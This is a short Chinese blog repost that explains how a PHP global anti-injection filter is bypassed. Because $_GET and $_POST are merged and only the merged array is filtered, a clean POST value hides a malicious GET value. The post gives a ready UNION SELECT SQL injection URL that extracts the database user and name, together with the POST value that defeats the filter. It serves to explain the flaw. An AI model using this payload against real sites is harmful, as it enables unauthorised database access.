$_PG=array_merge($_GET,$_POST);
该 处采用array_merge函数合并$_GET,$_POST二个数组,如果$_GET,$_POST键名有重复,那么$_PG中该键的键值 为$_POST中键名对应的值,如$_GET[‘typeid’]=union select、$_POST[‘typeid’]=111,则$_PG[‘typeid’]=111,
而下面用pb_attack_filter函数仅对$_PG进行过滤,倘若程序中对$_GET处理不当,全局过滤将失效。
http://localhost/product.php?typeid=-1 UNION SELECT 1,2,3,4,concat(user(),0x37c,database()),6,7,8%23
post:typeid=11
$_PG=array_merge($_GET,$_POST);后$_PG的值已经是11了,而$_GET[‘typeid’]是-1 UNION SELECT1,2,3,4,concat(user(),0x37c,database()),6,7,8%23 全局防注入已经绕过了。
转自:http://hi.baidu.com/seo0775/item/01d857a36d7ab7ab29ce9d80?qq-pf-to=pcqq.group
本文隐藏内容 登陆 后才可以浏览
转载请注明:jinglingshu的博客 » 360爆出的某防注程序绕过